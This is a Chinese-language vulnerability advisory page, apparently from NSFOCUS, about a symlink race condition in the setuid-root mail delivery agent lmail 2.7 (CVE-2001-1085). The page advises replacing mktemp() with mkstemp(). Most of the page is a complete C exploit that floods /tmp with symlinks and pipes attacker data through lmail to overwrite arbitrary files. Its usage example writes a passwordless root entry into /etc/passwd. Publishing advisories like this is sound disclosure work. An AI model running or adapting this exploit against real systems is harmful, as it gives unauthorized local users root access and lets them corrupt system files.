首页 -> 安全研究
安全研究
安全漏洞
Lmail 临时文件竞争环境漏洞
发布日期:2001-07-05
更新日期:2001-07-10
受影响系统:
描述:
Jon Zeeff lmail 2.7
BUGTRAQ ID: 2984
CVE(CAN) ID: CVE-2001-1085
Jon Zeeff 开发的lmail是一个本地的mail传输代理(LDA)软件。
它存在一个条件竞争漏洞。lmail使用了不安全的函数mktemp()来处理临时文件,这可能
允许发生符号链接攻击。lmail也将标准输入的数据直接写到临时文件中。
由于lmail通常被设置了setuid root属性,本地攻击者可能将任意数据写入任意文件中,
从而获取root权限。
<*来源:Charles Stevenson (core@ezlink.com) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Charles Stevenson (core@ezlink.com)提供了下列测试代码:
/* lmail-xpl.c
*
* Quick hack to exploit lmail
*
* Simply run it with the file you want to create/overwrite
* and the data you wish to place in the file.
*
* Example:
*
* $ gcc -g -Wall lmail-xpl.c -o lmail-xpl
* $ ./lmail-xpl /etc/passwd owned::0:0::/root:/bin/bash
*
* Then login as owned... etc..
*
* by Charles Stevenson <core@ezlink.com>
*
* July 04 2001
*
* shoutz b10z
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#define TEMPFILE "/tmp/ez.XXXXXX"
#define BRUTE 128
void usage(char*);
int main(int argc, char **argv){
char tempfile[128] = TEMPFILE;
int fd, i;
pid_t pid;
char temp[512];
if (argc < 3){
usage(argv[0]);
}
if((fd = mkstemp(tempfile))==-1){
fprintf(stderr, "Error creating %s!\n",tempfile);
exit(1);
}
/* begin lazy slacker coding */
fprintf(stderr, "lmail-xpl.c by core (c) 2001\n");
fprintf(stderr, "> backing up %s to %s\n", argv[1], tempfile);
/* backup old file */
sprintf(temp, "/bin/cp %s %s", argv[1], tempfile);
system(temp);
/* set the date/time */
sprintf(temp, "/bin/touch -r %s %s", argv[1], tempfile);
system(temp);
pid = getpid();
fprintf(stderr, "> creating a lot of symlinks\n");
for (i=0;i<BRUTE;i++){
sprintf(temp, "/tmp/lmail%d", pid+i);
symlink(argv[1], temp);
}
sprintf(temp, "/bin/echo `perl -e 'print \"\\n\"'`%s | lmail -f\n", argv[2]);
fprintf(stderr, "Running a few times since I'm lazy.\n");
for (i=0;i<BRUTE;i++){
system(temp);
//sleep(1);
}
sprintf(temp, "/bin/ls -l %s", argv[1]);
system(temp);
fprintf(stderr, "> cleaning up\n");
sprintf(temp, "/bin/rm -f /tmp/lmail*; /bin/rm -f /tmp/ez.*");
system(temp);
fprintf(stderr, "All done. Enjoy!\n");
return 0;
}
void usage(char *name){
fprintf(stderr, "usage: %s <filename> <data>\n", name);
exit(1);
}
建议:
临时解决方法:
NSFOCUS建议您暂时换用别的替代程序,或者修改源码,将所有的mktemp()调用换成
mkstemp().
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本:
http://ftp.unicamp.br/pub/unix-c/mail/
浏览次数:3905
严重程度:0(网友投票)
绿盟科技给您安全的保障